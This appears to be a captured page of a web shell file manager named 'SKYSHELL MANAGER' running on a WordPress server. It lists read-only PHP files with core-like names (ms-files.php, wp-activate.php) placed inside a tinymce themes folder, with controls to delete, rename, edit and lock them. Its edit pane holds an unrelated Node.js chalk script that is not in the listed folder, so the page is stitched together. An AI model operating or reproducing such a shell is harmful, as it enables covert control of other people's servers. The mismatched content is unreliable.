📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: screenshot.js
import process from 'node:process'; import styles from 'ansi-styles'; import chalk from '../source/index.js'; // Generates screenshot for (const key of Object.keys(styles)) { let returnValue = key; // We skip `overline` as almost no terminal supports it so we cannot show it off. if ( key === 'reset' || key === 'hidden' || key === 'grey' || key === 'bgGray' || key === 'bgGrey' || key === 'overline' || key.endsWith('Bright') ) { continue; } if (/^bg[^B]/.test(key)) { returnValue = chalk.black(returnValue); } process.stdout.write(chalk[key](returnValue) + ' '); }
Save